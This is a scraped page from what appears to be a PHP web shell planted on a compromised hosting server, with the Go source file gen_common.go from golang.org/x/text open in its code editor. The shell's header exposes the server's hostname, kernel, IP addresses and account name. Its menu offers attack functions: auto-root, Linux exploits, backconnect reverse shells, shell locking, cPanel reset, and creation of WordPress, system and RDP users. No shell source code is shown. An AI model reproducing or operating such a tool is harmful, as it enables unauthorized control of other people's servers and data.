Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
text@v0.14.0 /
width /
[ HOME SHELL ]
Name
Size
Permission
Action
common_test.go
2.49
KB
-r--r--r--
example_test.go
1.38
KB
-r--r--r--
gen.go
3.14
KB
-r--r--r--
gen_common.go
2.59
KB
-r--r--r--
gen_trieval.go
797
B
-r--r--r--
kind_string.go
787
B
-r--r--r--
runes_test.go
11.87
KB
-r--r--r--
tables10.0.0.go
74.25
KB
-r--r--r--
tables11.0.0.go
75.38
KB
-r--r--r--
tables12.0.0.go
76.71
KB
-r--r--r--
tables13.0.0.go
76.53
KB
-r--r--r--
tables15.0.0.go
76.76
KB
-r--r--r--
tables9.0.0.go
71.37
KB
-r--r--r--
tables_test.go
1.49
KB
-r--r--r--
transform.go
5.67
KB
-r--r--r--
transform_test.go
13.83
KB
-r--r--r--
trieval.go
698
B
-r--r--r--
width.go
6.46
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gen_common.go
// Copyright 2015 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. //go:build ignore package main // This code is shared between the main code generator and the test code. import ( "flag" "log" "strconv" "strings" "golang.org/x/text/internal/gen" "golang.org/x/text/internal/ucd" ) var ( outputFile = flag.String("out", "tables.go", "output file") ) var typeMap = map[string]elem{ "A": tagAmbiguous, "N": tagNeutral, "Na": tagNarrow, "W": tagWide, "F": tagFullwidth, "H": tagHalfwidth, } // getWidthData calls f for every entry for which it is defined. // // f may be called multiple times for the same rune. The last call to f is the // correct value. f is not called for all runes. The default tag type is // Neutral. func getWidthData(f func(r rune, tag elem, alt rune)) { // Set the default values for Unified Ideographs. In line with Annex 11, // we encode full ranges instead of the defined runes in Unified_Ideograph. for _, b := range []struct{ lo, hi rune }{ {0x4E00, 0x9FFF}, // the CJK Unified Ideographs block, {0x3400, 0x4DBF}, // the CJK Unified Ideographs Externsion A block, {0xF900, 0xFAFF}, // the CJK Compatibility Ideographs block, {0x20000, 0x2FFFF}, // the Supplementary Ideographic Plane, {0x30000, 0x3FFFF}, // the Tertiary Ideographic Plane, } { for r := b.lo; r <= b.hi; r++ { f(r, tagWide, 0) } } inverse := map[rune]rune{} maps := map[string]bool{ "<wide>": true, "<narrow>": true, } // We cannot reuse package norm's decomposition, as we need an unexpanded // decomposition. We make use of the opportunity to verify that the // decomposition type is as expected. ucd.Parse(gen.OpenUCDFile("UnicodeData.txt"), func(p *ucd.Parser) { r := p.Rune(0) s := strings.SplitN(p.String(ucd.DecompMapping), " ", 2) if !maps[s[0]] { return } x, err := strconv.ParseUint(s[1], 16, 32) if err != nil { log.Fatalf("Error parsing rune %q", s[1]) } if inverse[r] != 0 || inverse[rune(x)] != 0 { log.Fatalf("Circular dependency in mapping between %U and %U", r, x) } inverse[r] = rune(x) inverse[rune(x)] = r }) // <rune range>;<type> ucd.Parse(gen.OpenUCDFile("EastAsianWidth.txt"), func(p *ucd.Parser) { tag, ok := typeMap[p.String(1)] if !ok { log.Fatalf("Unknown width type %q", p.String(1)) } r := p.Rune(0) alt, ok := inverse[r] if tag == tagFullwidth || tag == tagHalfwidth && r != wonSign { tag |= tagNeedsFold if !ok { log.Fatalf("Narrow or wide rune %U has no decomposition", r) } } f(r, tag, alt) }) }
Close